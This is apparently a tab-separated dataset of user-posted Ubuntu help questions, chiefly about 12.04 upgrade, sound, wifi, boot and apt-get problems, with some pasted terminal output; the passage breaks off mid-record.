135804	want sound only to headphones , when it plugged in , and in speakers else	i installed 12.04 today . it worked on 11.10 . now if headphones was plugged in on startup , they works , but if i unplug it , speakers do n't work . if headphones was n't plugged before startup , sound is in speakers and in headphones at the same time . laptop is acer aspire 5930 . card : hda intel chip : nvidia mcp77/78 hdmi riad @ riad-laptop : ~ $ cat /proc/asound/pcm 00-00 : alc888 analog : alc888 analog : playback 1 : capture 1 00-01 : alc888 digital : alc888 digital : playback 1 00-02 : alc888 analog : alc888 analog : capture 1 00-03 : hdmi 0 : hdmi 0 : playback 1 same problem in 12.10dev which additional info should i provide ?
135806	wifi slows ubuntu to a halt after waking from sleep	the computer is a msi wind u100+ netbook with ralink rt2700e . there was a similar issue i was able to correct in 10.04 by adding some blacklist drivers in /etc/modprob.d but the issue then only meant i could not connect to internet after waking . now it causes everything to slow to unusable as it tries to connect even if i turn off wifi and i am forced to hard reboot the machine . as i am running conky i can see the process eating up the cpu - it is something like kirqsofd or some such thing . i apologize i do not remember the exact name of the process but i 'm sure that is close . i do not believe installing wicd is a solution as that also did not completely work in 10.04 . it is something to do with the drivers i am certain . in 10.04 this is to fix wifi on the msi wind with the ralink rt2700e . blacklist rt2800pci blacklist rt2800lib blacklist rt2x00pci blacklist rt2x00lib saved as /etc/modprobe.d/blacklist-rt2800.conf but adding this in 12.04 means no wireless at all . : (
135807	ubuntu 12.04 update not working	i have installed ubuntu 12.04 through update manager , i had 11.04 as the previous version and everything goes fine from downloading the packages to restarting the system . after restarting i found that there is no graphics related items in the installation and i cant able to move my trackpad in laptop . it shows a black screen with the desktop items but cant able to edit any items . there is no menu items available in the desktop . can any one help me in this .
135808	is ubuntu one + evolution/thunderbird sync still working in older versions like 10.04 ?	i have come across many , many questions regarding syncing contacts with ubuntu one . unfortunately this is not possible in 12.04 . i even asked ubuntuone-support and recieved this : hi , we are completely redoing contact sync . contact sync , i 'm afraid , will not be available in ubuntu 12.04 . we are optimistically hoping for contact sync to be back in 12.10 . the new service plans to be a great improvement . we do sincerely apologize about any inconvenience . thanks , ( ubuntuone-support @ canonical.com ) however , i was wondering if anyone knew if older distro versions were still able to sync - as it might be a good work around to install ubuntu one on a 10.04 live cd and then export the contacts as a .vcf after sync .
135817	can synaptic sort packages by time ?	i know software center can do this ( in the `` history '' section ) , but i 've yet to find a filter/column in synaptic that will sort the packages by the time they were installed/removed . i could really use this for , say , batch-removing stuff i recently installed but could n't remember the name/dependencies . can i set up a custom filter/column/property/whatever for this , or what ? i get the feeling that , at the very least , you should be able to do this from the terminal . if not , how come software center is able to do this ? something like this :
135818	the size of apt-get update lists is too big	this question contains circumventions for an bug in ubuntu : bug # 1001780 âapt-get update size is too bigâ : bugs : launchpad itself , as well as some general advice on saving bandwidth when doing apt-get update . that bug was closed on 8 aug 2012 , so you may only need the information related to this question should the bug reappear . if that happens please file another bug report on launchpad . i ran a clean install to ubuntu 12.04 and so far everything has been working well . i especially commend the ubuntu team for this release . i only noticed that the size of repository update is now about ~13mb . normally , it is about this size for the first time you run apt-get update after a clean install and then ~ 23kb - 1300kb for subsequent updates . the output from apt-get update is the same i get for previous versions of ubuntu ( its pretty normal ) . its a bit too long but look at an example output i got from running apt-get update . ign http : //archive.canonical.com precise inrelease ign http : //dl.google.com stable inrelease ign http : //dl.google.com stable inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease hit http : //download.virtualbox.org precise inrelease ign http : //security.ubuntu.com precise-security inrelease ign http : //linux.dropbox.com precise inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //download.skype.com stable inrelease hit http : //archive.canonical.com precise release.gpg get:1 http : //dl.google.com stable release.gpg [ 198 b ] ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net precise inrelease get:2 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] get:3 http : //extras.ubuntu.com precise release.gpg [ 72 b ] hit http : //download.virtualbox.org precise/contrib i386 packages ign http : //download.skype.com stable release.gpg hit http : //linux.dropbox.com precise release.gpg ign http : //us.archive.ubuntu.com precise inrelease ign http : //us.archive.ubuntu.com precise-updates inrelease ign http : //us.archive.ubuntu.com precise-backports inrelease hit http : //archive.canonical.com precise release get:4 http : //dl.google.com stable release.gpg [ 198 b ] ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg get:5 http : //security.ubuntu.com precise-security release [ 49.6 kb ] hit http : //extras.ubuntu.com precise release ign http : //download.skype.com stable release ign http : //download.virtualbox.org precise/contrib translationindex get:6 http : //us.archive.ubuntu.com precise release.gpg [ 198 b ] hit http : //archive.canonical.com precise/partner i386 packages hit http : //linux.dropbox.com precise release get:7 http : //ppa.launchpad.net precise release.gpg [ 316 b ] hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //extras.ubuntu.com precise/main sources get:8 http : //ppa.launchpad.net precise release.gpg [ 316 b ] hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg get:9 http : //us.archive.ubuntu.com precise-updates release.gpg [ 198 b ] ign http : //archive.canonical.com precise/partner translationindex ign http : //download.skype.com stable/non-free i386 packages/diffindex get:10 http : //dl.google.com stable release [ 1,347 b ] hit http : //linux.dropbox.com precise/main i386 packages hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net oneiric release.gpg hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net oneiric release.gpg hit http : //ppa.launchpad.net oneiric release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg get:11 http : //us.archive.ubuntu.com precise-backports release.gpg [ 198 b ] ign http : //download.skype.com stable/non-free translationindex get:12 http : //dl.google.com stable release [ 1,347 b ] hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release ign http : //linux.dropbox.com precise/main translationindex hit http : //ppa.launchpad.net precise release ign http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release get:13 http : //ppa.launchpad.net precise release [ 11.9 kb ] get:14 http : //us.archive.ubuntu.com precise release [ 49.6 kb ] hit http : //download.skype.com stable/non-free i386 packages get:15 http : //dl.google.com stable/main i386 packages [ 1,268 b ] ign http : //dl.google.com stable/main translationindex hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net oneiric release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net oneiric release get:16 http : //security.ubuntu.com precise-security/main sources [ 7,089 b ] hit http : //ppa.launchpad.net oneiric release get:17 http : //dl.google.com stable/main i386 packages [ 769 b ] ign http : //dl.google.com stable/main translationindex hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages get:18 http : //security.ubuntu.com precise-security/restricted sources [ 14 b ] get:19 http : //security.ubuntu.com precise-security/universe sources [ 3,653 b ] get:20 http : //security.ubuntu.com precise-security/multiverse sources [ 696 b ] get:21 http : //security.ubuntu.com precise-security/main i386 packages [ 32.9 kb ] ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex get:22 http : //us.archive.ubuntu.com precise-updates release [ 49.6 kb ] ign http : //ppa.launchpad.net precise/main sources/diffindex ign http : //ppa.launchpad.net precise/main i386 packages/diffindex ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages get:23 http : //security.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:24 http : //security.ubuntu.com precise-security/universe i386 packages [ 8,594 b ] get:25 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 1,393 b ] hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex ign http : //ppa.launchpad.net precise/main translationindex get:26 http : //us.archive.ubuntu.com precise-backports release [ 49.6 kb ] hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex get:27 http : //ppa.launchpad.net precise/main i386 packages [ 1,276 b ] ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources get:28 http : //us.archive.ubuntu.com precise/main sources [ 934 kb ] hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main i386 packages hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net oneiric/main sources hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //archive.canonical.com precise/partner translation-en_us hit http : //ppa.launchpad.net oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //ppa.launchpad.net precise/main sources ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //download.virtualbox.org precise/contrib translation-en_us ign http : //archive.canonical.com precise/partner translation-en hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //extras.ubuntu.com precise/main translation-en ign http : //download.virtualbox.org precise/contrib translation-en hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources ign http : //linux.dropbox.com precise/main translation-en_us hit http : //ppa.launchpad.net precise/main i386 packages ign http : //download.skype.com stable/non-free translation-en_us ign http : //linux.dropbox.com precise/main translation-en ign http : //download.skype.com stable/non-free translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us get:29 http : //us.archive.ubuntu.com precise/restricted sources [ 5,470 b ] get:30 http : //us.archive.ubuntu.com precise/universe sources [ 5,019 kb ] ign http : //dl.google.com stable/main translation-en get:31 http : //us.archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:32 http : //us.archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:33 http : //us.archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:34 http : //us.archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en get:35 http : //us.archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] hit http : //us.archive.ubuntu.com precise/main translationindex hit http : //us.archive.ubuntu.com precise/multiverse translationindex hit http : //us.archive.ubuntu.com precise/restricted translationindex hit http : //us.archive.ubuntu.com precise/universe translationindex get:36 http : //us.archive.ubuntu.com precise-updates/main sources [ 31.2 kb ] get:37 http : //us.archive.ubuntu.com precise-updates/restricted sources [ 765 b ] get:38 http : //us.archive.ubuntu.com precise-updates/universe sources [ 10.1 kb ] get:39 http : //us.archive.ubuntu.com precise-updates/multiverse sources [ 696 b ] get:40 http : //us.archive.ubuntu.com precise-updates/main i386 packages [ 96.5 kb ] get:41 http : //us.archive.ubuntu.com precise-updates/restricted i386 packages [ 770 b ] get:42 http : //us.archive.ubuntu.com precise-updates/universe i386 packages [ 27.7 kb ] get:43 http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages [ 1,393 b ] hit http : //us.archive.ubuntu.com precise-updates/main translationindex hit http : //us.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //us.archive.ubuntu.com precise-updates/restricted translationindex hit http : //us.archive.ubuntu.com precise-updates/universe translationindex get:44 http : //us.archive.ubuntu.com precise-backports/main sources [ 700 b ] get:45 http : //us.archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:46 http : //us.archive.ubuntu.com precise-backports/universe sources [ 1,680 b ] get:47 http : //us.archive.ubuntu.com precise-backports/multiverse sources [ 14 b ] get:48 http : //us.archive.ubuntu.com precise-backports/main i386 packages [ 559 b ] get:49 http : //us.archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:50 http : //us.archive.ubuntu.com precise-backports/universe i386 packages [ 1,391 b ] get:51 http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages [ 14 b ] hit http : //us.archive.ubuntu.com precise-backports/main translationindex hit http : //us.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //us.archive.ubuntu.com precise-backports/restricted translationindex hit http : //us.archive.ubuntu.com precise-backports/universe translationindex hit http : //us.archive.ubuntu.com precise/main translation-en hit http : //us.archive.ubuntu.com precise/multiverse translation-en hit http : //us.archive.ubuntu.com precise/restricted translation-en hit http : //us.archive.ubuntu.com precise/universe translation-en hit http : //us.archive.ubuntu.com precise-updates/main translation-en hit http : //us.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //us.archive.ubuntu.com precise-updates/restricted translation-en hit http : //us.archive.ubuntu.com precise-updates/universe translation-en hit http : //us.archive.ubuntu.com precise-backports/main translation-en hit http : //us.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //us.archive.ubuntu.com precise-backports/restricted translation-en hit http : //us.archive.ubuntu.com precise-backports/universe translation-en fetched 12.8 mb in 1min 33s ( 137 kb/s ) is this a new feature in 12.04 ? or , if it is unintended , is there a way i can fix this ? thanks .
135821	can i run sudo without entering a password ?	i like ubuntu , but i hate entering a password every time when i run a command with sudo . can i avoid it ?
135822	kubuntu wo n't lock	when i close the screen of my netbook in kubuntu , it does n't lock when i reopen , and when i press the lock button , nothing happens . i have kscreensaver configured , and all the drivers work fine , so how do i get my computer to lock ?
135824	what is the tomcat installation directory ?	based here i 'm trying to setup tomcat server , i have successfully installed it and tested it . then i stopped it as recommended in the tutorial . i 'm setting up `` new server runtime environment '' as you can see under tomcat installation directory is a windows directory , anyone knows the ubuntu directory equivalent for this ? thanks .
135825	ubuntu 12.04 completely dead screen on first boot ?	so when i try and load up ubuntu for the first time , ( booting from the live cd ) after some time the monitor just blanks off . the other system parts are still moving , but i can not do anything at all , seeing as i have no way of seeing the screen . it goes in this order : boot , bios message , boot menu , select cd/dvd rom drive , a few commands which pass by too quickly to read , purple screen with two icons at the bottom which stays there for about 10-15 seconds , a blinking cursor , then the monitor just blanks out and i ca n't do anything at all . as i stated earlier everything else was running fine except the screen which rendered everything pretty much useless . any ideas on how to get around this ? edit : for those wanting specs , here they are : my model is a hp pavillion g6 notebook , intel i5 2340m dual core processor ( 2.4ghz ) 6 gb ram , intel hd graphics 3000 . 1366x768 display resolution . i 'll try and get more specs next time i have it on .
135828	how to create more partitions ?	i currently have only one partition but want to create some more partitions . how can i partition my drive using ubuntu ? and is data formatted from documents when we upgrade ubuntu to new release ?
135830	problem udating after just downloading 12.04	i have just recently upgraded from 11.10 to 12.04 and when i run the updates for 12.04 and restart the computer , it goes to the purple loading page and freezes there . i have tried re-installing it several times and several different ways , but it continues to do it . if i do not install the updates it runs just fine and turns on . i think there is a problem with one of the updates . what can i do ? thanks !
135837	lenovo u400 , ubuntu 12.04 . sudden reboots / power down	i 've recently bought a lenovo u400 ( http : //www.lenovo.com/products/us/laptop/ideapad/u-series/u400/ ) and installed ubuntu 12.04 on it . everything works fine ( i 've installed the proprietary ati drivers for switchable graphics ) except that i get a random power down or reboot either while surfing the web or watching videos . monitoring the temperature with sensors , the laptop never goes into any critical zone but still may power down or reboot once in a while . is there any logs that i should check and any particular message i should take note of ? edit : this happens to me as well . this also happens without proprietary drivers activated .
135840	shell script to read files and replace lines	i need help creating a shell script to search .yml files in a specific folder for a line containing money : and then replacing that line with money : 1000
135847	safely dual-boot xp and ubuntu 12.04 desktop ?	my netbook acer aod255 has three primary partitions in it by default - pqservice/recovery ( ntfs ) , android x86 1.6 ( fat32 ) , and the main winxp home sp3 ( pre-installed , dual-booted with android from inside winxp ) . i was able to resize all three partitions to give 9gb of unallocated space for a future ubuntu installation , which can already be booted from a pendrive . here 's my problems : 1 . ) i do n't know how to install ubuntu on that 9gb space ( even if i create an unformatted partition for it ) 2 . ) i currently have no means of reinstalling my xp , or backing-up any data ( so i do n't want to accidentally wipe out my whole hdd at all ) 3 . ) i want xp and ubuntu to be dual-booted thru a boot manager like grub or something more practical ( but google searches confuse me ) 4 . ) when i boot to try ubuntu , gparted displays my whole drive as unallocated space . it also says `` ca n't have overlapping partitions '' or something .
135848	how to close filezilla via terminal	i am working on server files temporarily through filezilla in ubuntu 11.10 . sometimes when i close the file from my ide , filezilla crashes and it does not working properly . if i try to close the filezilla , it does not closes . so , is there any way to close the filezilla through terminal ? any help kindly appreciated . thanks .
135849	is there any disadvantage if i install ubuntu on windows ?	will there be any problems or bugs if i install ubuntu on windows with the windows installer.if i install will i get the exact same ubuntu or will there be any thing missing . will i get the exact power and performance of ubuntu ?
135855	dvds do n't play after installing the restricted packages	i 've installed the ubuntu restricted area packages tried several things but no dvd play . audio cd works fine , i built this system especially for linux all new hardware . dvd drive worked fine in a windows system . could it be a hardware issue , perhaps the drive having no specific name brand such as sony or lite on ?
135857	how to boot ubuntu , when windows was reinstalled ?	i installed ubuntu inside windows . windows was on the c drive . ubuntu was on the e drive . i reinstalled windows . now windows is running but ubuntu does not boot at start up . how do i recover from this problem ?
135875	operation times out trying to ssh outside lan i.e . from internet to lan no connection is established	i run ubuntu 12.04 and have no success connecting with ssh from `` internet '' . the router is a tl-mr3420 which is set up to forward requests to one of the nic 's on ubuntu machine ( which has in total 3 nics ) . i can ssh from a client on the `` local '' network/lan . the forward mechanism in the router seems to work . if i stop ssh service on the ubuntu machine and instead start one on the windows machine - it works like a charm . i do not use the std port 22 but that should n't be an issue as far as i understand - sine it works on the same port on the win machine . since my public is is n't static i use a dyndns service but as said earlier the same setup works from the win machine . the router is located on 192.168.0.1 the ubuntu nics has the following ip : eth2 192.168.0.100 , eth1 192.168.0.101 , eth0 192.168.0.102 and i have forwarded the `` outside '' request to 192.168.0.100 in regards for firewall settings on the ubuntu machine i have disabled the ufw and the command ufw status give status : inactive . i do n't now it this is relevant information but teh command iptables -- list give : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination i have tried to catch traffic with help of wireshark ( a tool i 'm not too used to use ) and it seems as a few ( 3 ? ) `` requests '' actually reaches the nic but ... nothing happens . the syslog does not show any entries during these attempts . perhaps it could be some routing issues but i have reached my level of competence and are stuck ... all help and support to get this sorted out is much appreciated . i 'm new to linux so please do not assume i have a configuration that is correct - but as i wrote earlier - if the client that initiate ssh is on the lan it all works . ps : i have also tried to get vpn ( ppp ) working from internet with no success - once again vpn works on the windows machine ... so my best guess is that this is related to how the ubuntu machine handles ( ip ) traffic and not the tl-mr3420 router or other network issues .
135882	switching from mac osx lion theme back to 12.04 easily	so i was thinking about installing a mac osx lion theme onto my ubuntu 12.04 computer ( just for fun ) . i have never installed a theme before but i have watched videos and know in general how it is done but one question still remains . after installing mac osx lion theme ( for example ) can i easily and quickly switch back to my previous 12.04 settings ? then am i able to jump back and forth at a few clicks of the mouse ? basicly i am just wondering after everything is set up can i switch my computer from looking like osx to 12.04 at my leisure or do i always have you change all of my settings ? thanks .
135883	no sound on laptop speakers on an acer aspire 6920	computer : acer aspire 6920 card : hda intel chip : realtek alc889 my problem is that the laptop build-in speakers do n't play any sound . when i plug in my headphones the sound works normally , the same goes with external speakers . those work normally like the headphones . the profile in the sound settings is analog two-way stereo . i am using ubuntu 12.04 . might trere be any problem with my sound drivers or something similar ? any form of help appreciated .
135884	how do i install support for unicode emoji in chromium ?	how do i make chromium on kubuntu render emoji unicode characters ? like these : â¤
135886	installing ubuntu 12.04	i have dual boot vista and ubuntu 11.10 installed ubuntu 12.04 with live cd a message : download some applications install manually installation completed . removed the live cd and restarted . it does not boot . a message grub . comes up giving options for startup . but will not start . it starts with the live cd please help . all my files are in the computer .
135888	can not boot ubuntu 12.04 on lenovo v570 fresh install	i just did a fresh install of kubuntu 64 bit 12.04 ( from the dvd ) to a lenovo v570 laptop . i did a dual boot install with windows 7 . i used the boot layout leftover from linux mint 12 ( which was working ) . the installation finished with what seemed to be a success . however , when rebooting , i get this error : grub : âinvalid arch independent elf magicâ after install on ssd then i did grub-install and update-grub ( i did n't install grub-efi , so maybe this is the problem ? ) then i got `` unknown filesystem error '' at the grub prompt . desperately , i gave /boot the bootable flag . then on a reboot , ... i got some strange screen with the letters pxe . it flashed momentarily , too fast to read , and then the computer jumped to a screen which asked me from which drive was the boot desired to be . as of now , i have no idea what i am doing .
135891	ubuntu has no sound	i am using ubuntu via wubi . i do n't hear a single noise or sound , no matter i am playing a song or video . how should i fix it ? thz i have already installed the ubuntu restricted extras and flash , as well as all available updates , but it still does n't give me a single sound , what should i do ? is there any sound drive i have to install just like win7 ? and how could i find the drive ? i am using an acer 4830 notebook with win7 . certainly , my nb has on board sound card . my ubuntu version is 12.04 lts .
135906	touchpad problems worsening over time !	thought that i would add some information regarding laptop touhpad issues . i have a samsung r530 laptop running ubuntu 12.04 . there has always been issues with my touchpad ; it would start by being erratic , then would move only small amounts at a time and occasionally it would correct , sometimes i would need a reboot . now since the upgrade things are getting rather strange ! initially the touchpad worked great , then it reverted back to its operation problems as with ubuntu 11.10 ; now the cursor randomly freezes and the only option is to reboot . it seems that over time the problem is getting worse , is it possible that the problem could worsen over time ? is there any hope of a fix ? i also have a compaq presario running ubuntu 12.04 with no cursor problems as yet , it has a wireless mouse attached .
135907	ripped mp3 files show wrong track lengths	i have seen this problem both when using banshee and sound juicer . i 'm using ubuntu 12.04 on a thinkpad 14 '' . i 'm not sure about the make of my internal cd drive , but would be glad to provide you with that information if someone tells me how to . i have not had access to an external cd drive so that i could tell if the problem is my internal cd drive . anyway , the problem : the mp3 files i have ripped show wrong lengths . for example when i ripped peacebone by animal collective , which 's length is 5:13 , the file was 25 minutes long , according to my phone and banshee . the players skip to the next song before playing the whole 25 minutes . however , i 'm not comfortable not knowing if i 'm listening to the whole thing or the real length of the song . this far the problem has disappeared on a second rip , although the file lengths are still occasionally a few seconds longer than they 're supposed to be .
135908	using the installer and clicking upgrade - are they the same ?	i 'm currently using 11.10 . i have a downloaded copy of 12.04 on cd . question : is it the same if i hit the upgrade button on the update manager , or install 12.04 through the cd ? will i lose my work/settings/installed apps ( lamp , lazarus , etc ) by either method ? i know if i boot from the cd and install , i 'll most certainly lose everything ... but my question is will this happen even if i run the cd while on ubuntu ? thanks !
135909	which packages recommended 'missing recommends ' ?	the synaptic package manager has a custom filter `` missing recommends '' . is there a way to find out which packages installed on my system recommended the packages listed in this filter ?
135910	how do you completely purge an installed aplication ?	i installed ultraeditor ( uex package ) from a source i ca n't remember . later i purged the installation with : aptitude purge uex the application disappeared but its name still appears when i type alt-f2 , as one of the installed applications . is there a way to prevent this from happening ?
135912	banned from ubuntu forums for spam . could my ubuntu have a virus ?	my ip address has been banned from the ubuntu forums for spam but i have no knowledge of the spam or what could be happening . i have been in touch with the admins there but they refuse to help basically saying `` we will un-ban you when you stop the spam . '' since i do n't know what is happening it feels to me like a security problem or maybe a virus on my ubuntu machine is sending spam ? i know people say that ubuntu is virus proof but could this be an exception ?
135914	toggling the location bar view in nautilus file manager	how do you add a button to toggle nautilus ' location bar between the string ( text view ) and the buttons view , as it was before ? now , in nautilus file manager , to change the view of the location bar you have to go to the menu bar and click `` go '' , then `` locations ... '' to be able to cut and paste paths . it is a slow process and the program does n't even remember your last choice nor it has an option in the configuration to choose your preferred view . if i want to toggle the view , why do i need to click `` go '' and then `` location ... . '' when i do n't want to go anywhere ? it was much better before and this design has been solved by humanity long time ago . there is no need to use a worse design in linux , so i would like to put a button to toggle the view . how can i do it ?
135917	failure to boot after upgrade from 10.10 to 12.04	after upgrade from 10.10 - > 11.04 - > 11.10 - > 12.04 i got this error : how can i solve this ?
135931	how can i delete the command line history from the dash ?	when accessing the command line by pressing alt+f2 it opens the dash and displays a history of previous commands which have been entered . how can this history be removed ? i 've tried using activity log manager but that only seems to be relevant to deleting the history of recent files rather than these commands .
135932	apt-get update : failure to fetch ; ca n't connect to any sources	i realize there are dozens of `` apt-get update : failure to fetch '' questions ( i read through all i could find ) , but my present circumstance is unique to 12.04 and it affects all sources ; not just launchpad . additionally , i 've tried several different servers in europe and the u.s. as well as the `` main server '' ( wherever that is ) and they all yield the same result : i ca n't connect to any software sources . additionally , i 'm fairly certain the problem stems from the upgrade from 11.10- > 12.04 i performed this morning , as updates worked immediately before . updates from the update manager worked fine and i could download some things ( mutter ) from the software center without incident , which makes me think i can connect to some subset of the ubuntu servers ( however , several other ubuntu servers -- like extras -- and some canonical servers are listed as 'unable to connect ' ) . here is the output from sudo apt-get update : sudo apt-get update ign http : //ftp.u-picardie.fr precise inrelease ign http : //archive.canonical.com precise inrelease ign http : //ftp.u-picardie.fr precise-updates inrelease ign http : //ftp.u-picardie.fr precise-backports inrelease err http : //ftp.u-picardie.fr precise-security inrelease err http : //ftp.u-picardie.fr precise release.gpg unable to connect to ftp.u-picardie.fr : http : err http : //ftp.u-picardie.fr precise-updates release.gpg unable to connect to ftp.u-picardie.fr : http : err http : //ftp.u-picardie.fr precise-backports release.gpg unable to connect to ftp.u-picardie.fr : http : err http : //ftp.u-picardie.fr precise-security release.gpg unable to connect to ftp.u-picardie.fr : http : hit http : //archive.canonical.com precise release.gpg hit http : //archive.canonical.com precise release hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex ign http : //dl.google.com stable inrelease ign http : //dl.google.com stable inrelease err http : //archive.canonical.com precise/partner translation-en_us unable to connect to archive.canonical.com : http : [ ip : 91.189.92.150 80 ] err http : //archive.canonical.com precise/partner translation-en unable to connect to archive.canonical.com : http : [ ip : 91.189.92.150 80 ] ign http : //extras.ubuntu.com precise inrelease get:1 http : //dl.google.com stable release.gpg [ 198 b ] err http : //extras.ubuntu.com precise release.gpg could not connect to extras.ubuntu.com:80 ( 91.189.88.33 ) . - connect ( 111 : connection refused ) ign http : //ppa.launchpad.net precise inrelease err http : //ppa.launchpad.net precise inrelease err http : //ppa.launchpad.net precise inrelease err http : //ppa.launchpad.net precise inrelease err http : 